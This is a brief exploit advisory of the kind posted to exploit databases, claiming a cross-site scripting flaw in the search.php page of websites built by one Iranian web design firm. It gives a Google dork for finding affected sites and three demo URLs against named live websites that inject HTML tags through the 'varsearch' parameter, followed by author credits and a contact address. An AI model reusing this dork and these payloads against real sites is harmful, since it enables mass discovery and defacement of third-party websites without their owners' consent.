########################## # Exploit Title:ahrar-andeysheh xss Vulnerability # Google Dork : intext:"طراحی و تولید: مؤسسه احرار اندیشه" inurl:search.php # https://www.youtube.com/channel/UCyngNTHNoRLQkWRn3bQjpJQ # Discovered By: Mr.voltage # Vendor Homepage : www.ahrareandeysheh.ir ########################## # {DEMO} http://www.atabatnews.ir/search.php?varsearch=%3Ch1%3EMr.voltage%3C%2Fh1%3E&searchenjine=valiasr-aj&submited=submit http://www.hezbollah-k.com/search.php?varsearch=%3Cfont%20size=%2212%22%20color=%22blue%22%20face=%22arial%22%3EMr.voltage%3C/font%3E http://www.sabernews.com/search.php?varsearch=%3Cfont%20size=%2212%22%20color=%22blue%22%20face=%22arial%22%3EMr.voltage%3C/font%3E ################################### #Thanks to : Shayan 72 - T!nk3r # Discovered By: Mr.voltage # skype: mr.voltage@yahoo.com